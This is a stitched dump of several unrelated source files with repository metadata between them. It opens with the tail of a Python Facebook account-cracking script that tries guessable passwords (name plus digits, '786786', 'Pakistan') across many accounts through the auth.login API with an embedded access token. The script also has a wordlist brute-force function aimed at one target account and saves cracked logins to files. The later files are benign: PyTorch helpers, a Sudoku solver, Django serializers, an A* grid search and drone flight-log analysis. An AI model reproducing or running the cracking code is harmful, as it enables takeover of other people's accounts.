cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass2 + ' 👽 ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass2 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass3 + ' 👽 ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass3 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass4 + ' 👽 ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass4 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;97m....'
print "\033[1;32;40m[+] Total OK/\033[1;97mCP \033[1;97m: \033[1;97m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;97m[\033[1;97mExit\033[1;97m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\033[1;97m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\033[1;97m[+] \033[1;97mID\033[1;97m/\033[1;97mEmail \033[1;97mTarget \033[1;97m:\033[1;97m ')
passw = raw_input('\033[1;97m[+] \033[1;97mWordlist \033[1;97mext(list.txt) \033[1;97m: \033[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\033[1;97m[\033[1;97m\xe2\x9c\x93\033[1;97m] \033[1;97mTarget \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[+] \033[1;97mTotal\033[1;97m ' + str(len(total)) + ' \033[1;97mPassword'
jalan('\033[1;97m[\xe2\x9c\xba] \033[1;97mPlease wait \033[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\033[1;97m[\033[1;97m\xe2\x9c\xb8\033[1;97m] \033[1;97mTry \033[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print 52 * '\033[1;97m\xe2\x95\x90'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\033[1;97m[!] \033[1;97mAccount Maybe Checkpoint'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\033[1;97m[!] Connection Error'
time.sleep(1)
except IOError:
print '\033[1;97m[!] File not found...'
print """\n\033[1;97m[!] \033[1;97mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | ROoHii.noreply@github.com | |
6caf2d70cd85ad7bafa882404400345e53f618be | b32caab19ed8fac30cf48e226441602924f1ed1f | /utils.py | 7377d3f4e33fc68c4a0475198a785291cd1657bf | [] | no_license | Wooyong-Choi/attn_style_transfer | be38bc332580b7e5d53aa4096a9b63369d6dadcc | f25bb4860df290b2c89e3c3916aa671380344bf8 | refs/heads/master | 2020-04-26T12:50:34.517368 | 2019-03-08T15:16:54 | 2019-03-08T15:16:54 | 173,562,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | import torch
def sequence_mask(lengths, hops, max_len=None):
    """
    Boolean mask for padded sequences, replicated once per attention hop.

    Returns a tensor of shape (batch, hops, max_len) where entry
    [b, h, t] is True iff t < lengths[b].
    """
    num_seqs = lengths.numel()
    limit = max_len or lengths.max()
    positions = (torch.arange(0, limit)
                 .type_as(lengths)
                 .to(lengths.device))
    # (batch, max_len): True where the position is inside the sequence.
    base_mask = positions.repeat(num_seqs, 1) < lengths.unsqueeze(1)
    # Replicate for every hop and bring the batch dimension first.
    return base_mask.repeat(hops, 1, 1).transpose(0, 1)
def frobenius(matrix):
    """
    Mean Frobenius norm over a batch of matrices.

    matrix: tensor of shape (bs, r, r); returns a scalar tensor equal to
    the batch average of sqrt(sum of squared entries). A tiny epsilon is
    added before the square root to avoid underflow at zero.
    """
    batch_size = matrix.size(0)
    squared_sums = (matrix * matrix).sum(1).sum(1).squeeze() + 1e-10
    per_matrix_norms = squared_sums ** 0.5
    return per_matrix_norms.sum() / batch_size
"whdrmt12@gmail.com"
] | whdrmt12@gmail.com |
ccefa8887b00d5bd6d1144590d3eed54c5d81ae5 | 5ffa1d127fc8dfdad5f7cc5abb3dff447b76a749 | /Sudoku_Python_Shell/src/ConstraintNetwork.py | 1e0416953102934da7e0dba348a8de494be62f09 | [] | no_license | APM150/Sudoku-AI | b5b904f4e53bed43f1cf0af45f331edf72dd585a | 4f944c34e41d3f9d83a37947ee3d6b98e9c8b6a1 | refs/heads/master | 2022-11-23T18:21:14.981549 | 2020-07-27T01:34:36 | 2020-07-27T01:34:36 | 279,459,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,983 | py | import Variable
import Constraint
import SudokuBoard
from math import floor
"""
CSP representation of the problem. Contains the variables, constraints, and
many helpful accessors.
"""
class ConstraintNetwork:
    # ==================================================================
    # Constructors
    # ==================================================================
    def __init__ ( self, sboard = None ):
        """Build an empty network, or one populated from a SudokuBoard.

        When *sboard* is given, one Variable is created per cell (domain
        1..N for empty cells, a singleton domain for givens) and one
        constraint is created per row, column and p-by-q block.
        """
        self.constraints = []
        self.variables = []
        if sboard != None:
            board = sboard.board
            temp = []
            value = 0
            for i in range(sboard.N):
                for j in range(sboard.N):
                    value = board[i][j]
                    domain = []
                    if value == 0:
                        # Unassigned cell: full domain 1..N.
                        d = 1
                        while d <= sboard.N:
                            domain.append(d)
                            d += 1
                    else:
                        # Given cell: domain is just the given value.
                        domain.append(value)
                    # Index of the p-by-q block this cell belongs to.
                    block = int(((floor(i/sboard.p) * sboard.p) + floor(j/sboard.q)))
                    temp.append(Variable.Variable(domain,i,j,block))
            # Group the variables by row / column / block so that one
            # constraint can be built per group below.
            rows = dict()
            cols = dict()
            blocks = dict()
            for v in temp:
                row = v.row
                col = v.col
                block = v.block
                if not (row in rows.keys()):
                    rows[row] = []
                if not (col in cols.keys()):
                    cols[col] = []
                if not (block in blocks.keys()):
                    blocks[block] = []
                rows[row].append(v)
                cols[col].append(v)
                blocks[block].append(v)
            for v in temp:
                self.addVariable(v)
            # One constraint per row, one per column, one per block.
            for e in rows:
                c = Constraint.Constraint()
                for v in rows[e]:
                    c.addVariable(v)
                self.addConstraint(c)
            for e in cols:
                c = Constraint.Constraint()
                for v in cols[e]:
                    c.addVariable(v)
                self.addConstraint(c)
            for e in blocks:
                c = Constraint.Constraint()
                for v in blocks[e]:
                    c.addVariable(v)
                self.addConstraint(c)
    # ==================================================================
    # Modifiers
    # ==================================================================
    def addConstraint ( self, c ):
        """Add constraint *c* unless it is already in the network."""
        if c not in self.constraints:
            self.constraints.append( c )
    def addVariable ( self, v ):
        """Add variable *v* unless it is already in the network."""
        if v not in self.variables:
            self.variables.append( v )
    # ==================================================================
    # Accessors
    # ==================================================================
    def getConstraints ( self ):
        """Return the list of constraints (not a copy)."""
        return self.constraints
    def getVariables ( self ):
        """Return the list of variables (not a copy)."""
        return self.variables
    # Returns all variables that share a constraint with v
    def getNeighborsOfVariable ( self, v ):
        """Return every variable that shares at least one constraint with *v*.

        NOTE(review): assumes *v* belongs to at least one constraint;
        otherwise the remove() below would raise KeyError — confirm.
        """
        neighbors = set()
        for c in self.constraints:
            if c.contains( v ):
                for x in c.vars:
                    neighbors.add( x )
        # v itself was collected above; it is not its own neighbor.
        neighbors.remove( v )
        return list( neighbors )
    # Returns true if every constraint is consistent
    def isConsistent ( self ):
        """Return True iff no constraint in the network is violated."""
        for c in self.constraints:
            if not c.isConsistent():
                return False
        return True
    # Returns a list of constraints that contains v
    def getConstraintsContainingVariable ( self, v ):
        """
        @param v variable to check
        @return list of constraints that contains v
        """
        outList = []
        for c in self.constraints:
            if c.contains( v ):
                outList.append( c )
        return outList
    """
    Returns the constraints that contain variables whose domains were
    modified since the last call to this method.
    After getting the constraints, it will reset each variable to
    unmodified
    Note* The first call to this method returns the constraints containing
    the initialized variables.
    """
    def getModifiedConstraints ( self ):
        mConstraints = []
        for c in self.constraints:
            if c.isModified():
                mConstraints.append( c )
        # Clear the modified flag on every variable for the next call.
        for v in self.variables:
            v.setModified( False )
        return mConstraints
    # ==================================================================
    # String Representation
    # ==================================================================
    def __str__ ( self ):
        """Human-readable dump: variable names, constraints, then variables."""
        output = str(len(self.variables)) + " Variables: {"
        delim = ""
        for v in self.variables:
            output += delim + v.name
            delim = ","
        output += "}"
        output += "\n" + str(len(self.constraints)) + " Constraints:"
        delim = "\n"
        for c in self.constraints:
            output += delim + str(c)
        output += "\n"
        for v in self.variables:
            output += str(v) + "\n"
        return output
    # ==================================================================
    # Sudoku Board Representation
    # ==================================================================
    def toSudokuBoard ( self, p, q ):
        """Convert the network back into a SudokuBoard.

        Relies on self.variables still being in row-major cell order, the
        order __init__ created them in.
        """
        n = p*q
        board = [[ 0 for j in range( n )] for i in range( n )]
        row = 0
        col = 0
        for v in self.variables:
            board[row][col] = v.getAssignment()
            col += 1
            if col == n:
                # Wrap to the start of the next row.
                col = 0
                row += 1
        return SudokuBoard.SudokuBoard( p, q, board = board )
"xujohnathan021@163.com"
] | xujohnathan021@163.com |
543836db6a97bcf00b8154a8dffb531a23679736 | 32d031f9af37ff70505359f8add5fc44e645fd15 | /api/serializers.py | eb1b1b02439906890bee85ff94370717409d7eab | [] | no_license | Kirom/MovieRaterApi | cfc4851a80f9429e2c866d271638c234cddfaa40 | 3a904afe6813f692cd9f113e0ac6206c1d47434d | refs/heads/master | 2022-11-22T00:46:08.765712 | 2020-07-21T12:41:57 | 2020-07-21T12:41:57 | 277,317,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 858 | py | from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.authtoken.models import Token
from api.models import Movie, Rating
class UserSerializer(serializers.ModelSerializer):
    """Serializer for user registration; the password is write-only so it
    is never echoed back in API responses."""
    class Meta:
        model = User
        fields = ('id', 'username', 'password')
        extra_kwargs = {'password': {'write_only': True, 'required': True}}
    def create(self, validated_data):
        """Create the user (create_user hashes the password) and issue an
        auth token so the client can authenticate immediately."""
        user = User.objects.create_user(**validated_data)
        Token.objects.create(user=user)
        return user
class MovieSerializer(serializers.ModelSerializer):
    """Serializer exposing a movie with its rating aggregates.
    NOTE(review): num_of_ratings / avg_rating look like computed model
    properties (read-only) — confirm on the Movie model."""
    class Meta:
        model = Movie
        fields = ('id', 'title', 'description', 'num_of_ratings', 'avg_rating')
class RatingSerializer(serializers.ModelSerializer):
    """Serializer for a single user's star rating of a movie."""
    class Meta:
        model = Rating
        fields = ('id', 'movie', 'user', 'stars')
| [
"Vityamirono@yandex.ru"
] | Vityamirono@yandex.ru |
31f0668321cda6ff20e8d3f7aa3f9f8b8d439fd4 | af6c3a769f3abfd3fd65cca1fa7f713d175c968f | /parse_cf_yaml_files.py | 041aa7e2e4ee1a6c5559e5fc95372b8c21c06f3c | [] | no_license | vigneshkarthy3/Automation_Scripts | b72d8041a036314e23f1509ca9f186ae7d447683 | 751ef13b70980391ad16fdc9820f5e3f8e742f0b | refs/heads/master | 2022-12-28T20:34:50.246083 | 2022-12-18T12:35:08 | 2022-12-18T12:35:08 | 294,160,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | import os
import yaml,glob
os.chdir(r'testing')
resultdir = "result"
files = glob.glob("*.yaml")
# For every Cloud-Foundry manifest in ./testing, extract each application's
# name / memory / instance count and write a trimmed YAML to ./testing/result.
for file in files:
    # Build the output path portably (os.path.join instead of a
    # hard-coded Windows "\\" separator).
    resultfile = os.path.join(resultdir, file)
    new_dict = {}
    with open(file) as f:
        docs = yaml.load(f, Loader=yaml.FullLoader)
        # With several applications in one manifest, the last one wins
        # (pre-existing behavior).
        for each in docs["applications"]:
            try:
                new_dict["appname"] = each["name"]
                new_dict["memory"] = each["memory"]
                new_dict["instance"] = each["instances"]
            except KeyError:
                print("Key-error ", file)
    with open(resultfile, 'w') as newfile:
        # NOTE(review): assumes the "result" directory already exists.
        yaml.dump(new_dict, newfile, default_flow_style=False, sort_keys=False)
"vigneshkarthy3@gmail.com"
] | vigneshkarthy3@gmail.com |
db6f9e619cc3eb6af96cb90589f32f741554459c | c78ce4f66cc964c230ad60fbf2ced6b4811eab89 | /0x10-python-network_0/6-peak.py | ab8163dbefd2215b422669954178d075b0be06a2 | [] | no_license | jebichii/holbertonschool-higher_level_programming-1 | 89026557909851dd775ae355f036db89ebd9adb9 | 741953aa479af90e8eac6f1315415eff4a20224f | refs/heads/master | 2023-03-15T14:58:27.062528 | 2020-06-11T07:21:23 | 2020-06-11T07:21:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #!/usr/bin/python3
"""
Provides a function to find a peak element in an unsorted list of integers
"""
def find_peak(integers):
    """
    Binary-search for a peak (an element no smaller than its neighbors)
    in an unsorted list of integers; returns None for an empty list.
    """
    size = len(integers)
    if size == 0:
        return None
    if size == 1:
        return integers[0]
    if size == 2:
        return integers[0] if integers[0] > integers[1] else integers[1]
    mid = size // 2
    # Climb toward whichever neighbor is larger; a peak must lie that way.
    if integers[mid - 1] > integers[mid]:
        return find_peak(integers[:mid])
    if integers[mid + 1] > integers[mid]:
        return find_peak(integers[mid + 1:])
    return integers[mid]
| [
"pdeyoreo@gmail.com"
] | pdeyoreo@gmail.com |
366291ef3ecbe926e4c8e8c393691c15ae25005f | d599925c5eb90d03daa29bd6c749876a55380f52 | /main.py | 7f102609bc215a0af29755cfd10d679edd03911a | [] | no_license | jmelton22/informed_search | 364e421599498235c14cb3df6d42c321c3317363 | 39a49836ce82691657d05ba83fb35b797da3cb02 | refs/heads/master | 2020-08-29T19:33:28.522944 | 2019-09-30T15:01:01 | 2019-09-30T15:01:01 | 218,148,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,054 | py | #!/usr/bin/env python3
import heapq
from node import Node
import grid as g
import math
from random import choice
def informed_search(grid, start, goal, greedy=True, manhattan=True):
    """
    Entry point for a grid search: choose the heuristic, announce the
    configuration, and start the recursive search from *start* with
    empty frontier / visited / path accumulators.
    """
    h_func = manhattan_distance if manhattan else euclidean_distance
    print('Search algorithm:', 'Greedy search' if greedy else 'A*')
    print('Heuristic function:', h_func.__name__)
    root = Node(start, None, 0, h_func(start, goal), greedy)
    return search(grid, root, goal, h_func, [], [], greedy, [])
def search(grid, node, goal, heuristic, unexplored, visited, greedy, path):
    """
    Recursive best-first search step. Exits when the goal node has been
    reached or when the queue of unexplored nodes is empty.
    :return: if the goal is reached, a list of (coordinates, path cost)
             tuples from the goal back to the start and the number of
             nodes visited; otherwise None and the number of nodes visited.
    """
    visited.append(node)
    if node.value == goal:
        return set_path(node, path), len(visited)
    else:
        # Add valid neighboring nodes to unexplored queue
        expand_node(grid, node, goal, heuristic, visited, unexplored, greedy)
        if not unexplored:
            # Frontier exhausted without reaching the goal.
            return None, len(visited)
        else:
            # Recurse on the cheapest queued node.
            # NOTE(review): recursion depth grows with the number of
            # expansions; very large grids could hit the recursion limit.
            return search(grid, heapq.heappop(unexplored), goal, heuristic, unexplored, visited, greedy, path)
def step_cost(grid, pt):
    """Cost of stepping onto cell *pt* — the grid value at (row, col)."""
    row, col = pt[0], pt[1]
    return grid[row][col]
def manhattan_distance(pt1, pt2):
    """L1 distance: sum of absolute per-axis differences."""
    total = 0
    for a, b in zip(pt1, pt2):
        total += abs(a - b)
    return total
def euclidean_distance(pt1, pt2):
    """Straight-line (L2) distance between two points."""
    total = 0
    for a, b in zip(pt1, pt2):
        diff = a - b
        total += diff * diff
    return math.sqrt(total)
def set_path(node, path):
    """
    Walk parent links from *node* back to the start node, appending a
    (coordinates, path cost) tuple for each node along the way, and
    return the accumulated list (goal first, start last).
    """
    current = node
    while True:
        path.append((current.value, current.g))
        if current.parent is None:
            return path
        current = current.parent
def expand_node(grid, node, goal, heuristic, visited, unexplored, greedy):
    """
    Push the valid neighbors of *node* onto the unexplored priority queue.
    A neighbor is pushed if:
    - it has a non-zero grid value, has not been visited, and is not
      already queued, or
    - it is already queued but the new path to it has a better priority,
      in which case the worse queued duplicate(s) are replaced.
    """
    def in_unexplored(coord, q):
        # True if some queued node already has these coordinates.
        return coord in [x.value for x in q]
    def in_visited(coord, l):
        return coord in [x.value for x in l]
    for n in node.get_neighbors(grid):
        # Path cost of neighbor is the path cost to the parent + step cost to new coord
        path_cost = node.g + step_cost(grid, n)
        temp_node = Node(n, node, path_cost, heuristic(n, goal), greedy)
        if in_unexplored(n, unexplored):
            worse = [x for x in unexplored if x.value == n and x.priority > temp_node.priority]
            if worse:
                for duplicate in worse:
                    unexplored.remove(duplicate)
                # Bug fix: list.remove() breaks the heap invariant, so the
                # list must be re-heapified before pushing; the replacement
                # node is also pushed exactly once (previously one copy was
                # pushed per removed duplicate).
                heapq.heapify(unexplored)
                heapq.heappush(unexplored, temp_node)
        elif not in_visited(n, visited):
            heapq.heappush(unexplored, temp_node)
def get_user_coords(grid, text):
    """
    Prompt until the user enters a numeric coordinate that lands on a
    non-zero (passable) grid cell, then return it as [row, col].
    """
    while True:
        raw = input('Enter a {} coordinate (r, c): '.format(text))
        try:
            coord = [int(part) for part in raw.split(',')]
        except ValueError:
            print('Non-numeric coordinate entered')
            continue
        if step_cost(grid, coord) == 0:
            print('Invalid coordinate on grid')
        else:
            return coord
def main():
    """
    Interactive driver: load a grid, ask the user for start/goal coordinates,
    run an informed search, and report/write the resulting path.

    Depends on module-level names not shown here: `g` (presumably a grid
    utility module -- TODO confirm) and `informed_search` (defined earlier
    in this file).
    """
    grid = g.read_grid('grid.txt')
    # grid = g.make_grid(20, 20)
    g.print_grid(grid)
    print()
    start = get_user_coords(grid, 'start')
    end = get_user_coords(grid, 'goal')
    print('-' * 15)
    # Randomly toggles search and heuristic methods
    path, num_states = informed_search(grid, start, end,
                                       greedy=choice([True, False]),
                                       manhattan=choice([True, False]))
    print('Number of nodes expanded:', num_states)
    print('-' * 15)
    fname = 'path.txt'
    if path is None:
        print('No path found.')
    else:
        # path is goal-to-start; path[0][1] is the accumulated cost at the goal.
        print('Path length: {} nodes'.format(len(path)))
        print('Total cost:', path[0][1])
        print()
        g.output_grid(fname, grid, start, end, [x[0] for x in path])
        print()
        # Print in start-to-goal order, hence the reversal.
        print('Path: coordinate - cost')
        print('\n'.join('\t{} - {:02d}'.format(coord, cost) for coord, cost in path[::-1]))
if __name__ == '__main__':
    # Run the interactive driver only when executed as a script.
    main()
| [
"jmelton22@gmail.com"
] | jmelton22@gmail.com |
ea8ec717a90f286bfe885c6bc8ed63825d7f93cc | 4fcc4decad928d8df4fcfe2f519485acb38b112a | /users/urls.py | 418fffb9176b0de0db485338bf5a528497538b72 | [] | no_license | Timibreez/saveBlog | 04b7305b17ab329903b90ab3420260693a8d5a6c | e117d7b8281da146b39fb386a23cdec96365d7d3 | refs/heads/master | 2022-07-29T10:03:28.908881 | 2020-05-20T01:14:46 | 2020-05-20T01:14:46 | 265,412,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from django.urls import path, include
from . import views
app_name = 'users'
urlpatterns = [
path('signup', views.signup_user, name = 'signup'),
path('login', views.login_user, name = 'login'),
path('logout', views.logout_user, name = 'logout'),
] | [
"fftimi@gmail.com"
] | fftimi@gmail.com |
e6e21ac6bb4063b76eaa2241febd3f41d69cd517 | c6422f55de89cc1773ab637e199bc839a0149f11 | /simulators_investigation/system_id/misc/calculating_t2w.py | 509d25519e48f73535fc202a2214f4b4db55f9e5 | [] | no_license | maliesa96/quad_sim2multireal | 5e552a64c365844285554b51895fe7c1c856a7cf | 5ae30cbb90d26a73184f745a1710b952e1d28c88 | refs/heads/master | 2020-12-26T23:19:50.100550 | 2020-03-07T21:10:33 | 2020-03-07T21:10:33 | 237,683,646 | 0 | 0 | null | 2020-02-01T21:57:59 | 2020-02-01T21:57:58 | null | UTF-8 | Python | false | false | 5,383 | py | #!/usr/bin/env python
import argparse
import numpy as np
import os
import sys
from flight_data_reader import reader
import matplotlib.pyplot as plt
from scipy import signal
def normalize(v):
    """Return *v* scaled to unit length; a zero vector is returned unchanged."""
    norm = np.linalg.norm(v)
    return v if norm == 0 else v / norm
def scale_action(action):
    """
    Scale and clip raw network actions for use as training data.

    Maps values affinely from [-1, 1] to [0, 1] and clips the result to
    that range, element-wise, preserving the (batch, action_dim) shape.
    """
    dim = action.shape[1]
    shifted = 0.5 * (action + 1.0)
    return np.clip(shifted, a_min=np.zeros(dim), a_max=np.ones(dim))
def load_data(real_flight_file):
    """
    Load a real flight log and return (filtered velocities, scaled actions).

    Trims the leading/trailing ground-effect samples (target z at or below
    z_threshold), then low-pass filters the linear velocities and the scaled
    network outputs with an order-8 Butterworth filter.

    Fix over the previous version: it computed `rots = quat2R(...)`, but
    `quat2R` is not defined anywhere in this module, so the call raised a
    NameError at runtime. The rotation matrices were never part of the
    return value, so the quaternion handling is dropped entirely.
    """
    assert os.path.isfile(real_flight_file), "data path doesn't exist"
    log_data = reader.decode(real_flight_file, plot=False)
    # Clean the data so that it only contains valid flight samples:
    # keep the contiguous run where the controller's z target is airborne.
    z_threshold = 0.05
    start = end = 0
    found_start = False
    for z in log_data['ctrltarget.z']:
        if z > z_threshold and found_start == False:
            found_start = True
        if found_start == False:
            start += 1
        if z <= z_threshold and found_start == True:
            break
        end += 1
    for key in log_data:
        log_data[key] = log_data[key][start:end]
    # Low-pass Butterworth coefficients used for zero-phase smoothing below.
    b, a = signal.butter(8, 0.01)
    ## linear velocity
    abs_vx, abs_vy, abs_vz = log_data['stateEstimate.vx'], log_data['stateEstimate.vy'], log_data['stateEstimate.vz']
    ## neural network raw output
    thrust0, thrust1, thrust2, thrust3 = log_data['ctrlNN.out0'], log_data['ctrlNN.out1'], log_data['ctrlNN.out2'], log_data['ctrlNN.out3']
    abs_v = np.column_stack([abs_vx, abs_vy, abs_vz])
    actions = scale_action(np.column_stack([thrust0, thrust1, thrust2, thrust3]))
    return signal.filtfilt(b, a, abs_v, axis=0, padlen=150), signal.filtfilt(b, a, actions, axis=0, padlen=150)
def load_data_sim(real_flight_file):
    """
    Load a simulated flight log (CSV) and return (velocities, scaled actions).

    Unlike load_data(), the simulation log is a plain comma-separated matrix;
    the constants below document its column layout (several are unused here
    but kept as a reference for the file format).
    """
    assert os.path.isfile(real_flight_file) == True, "data path doesn't exist"
    # Column indices of the simulation CSV.
    TIME = 0
    X, Y, Z = 1, 2, 3
    Roll, Pitch, Yaw = 4, 5, 6
    VX, VY, VZ = 7, 8, 9
    Roll_rate, Pitch_rate, Yaw_rate = 10, 11, 12
    Xt, Yt, Zt = 13, 14, 15
    t0, t1, t2, t3 = 16, 17, 18, 19
    # pred_obs_idx = [19+i for i in range(1, 2*len(out_comp), 2)]
    log_data = np.loadtxt(real_flight_file, delimiter=',')
    ## eliminate ground effect and clean data: keep the contiguous run of
    ## rows where altitude z is above z_threshold.
    z_threshold = 0.1
    start = end = 0
    found_start = False
    for z in log_data[:, Z]:
        if z > z_threshold and found_start == False:
            found_start = True
        if found_start == False:
            start += 1
        if z <= z_threshold and found_start == True:
            break
        end += 1
    log_data = log_data[start:end]
    abs_v = log_data[:, VX:VZ+1]
    actions = scale_action(log_data[:, t0:t3+1])
    # rots = quat2R(log_data[:, QX:QW+1])
    return abs_v, actions ##, rots
def plot_t2w(abs_v, actions):
    """
    Estimate and plot the thrust-to-weight ratio over time.

    abs_v: (T, 3) array of world-frame linear velocities.
    actions: (T, 4) array of normalized motor commands in [0, 1].

    For each step, acceleration is obtained by finite differences of the
    velocity, gravity is compensated, and the ratio of the resulting total
    acceleration to the commanded (normalized) thrust gives the t2w
    estimate, assuming thrust is linear in the command. Prints the mean and
    std of the estimate and shows a diagnostic matplotlib figure
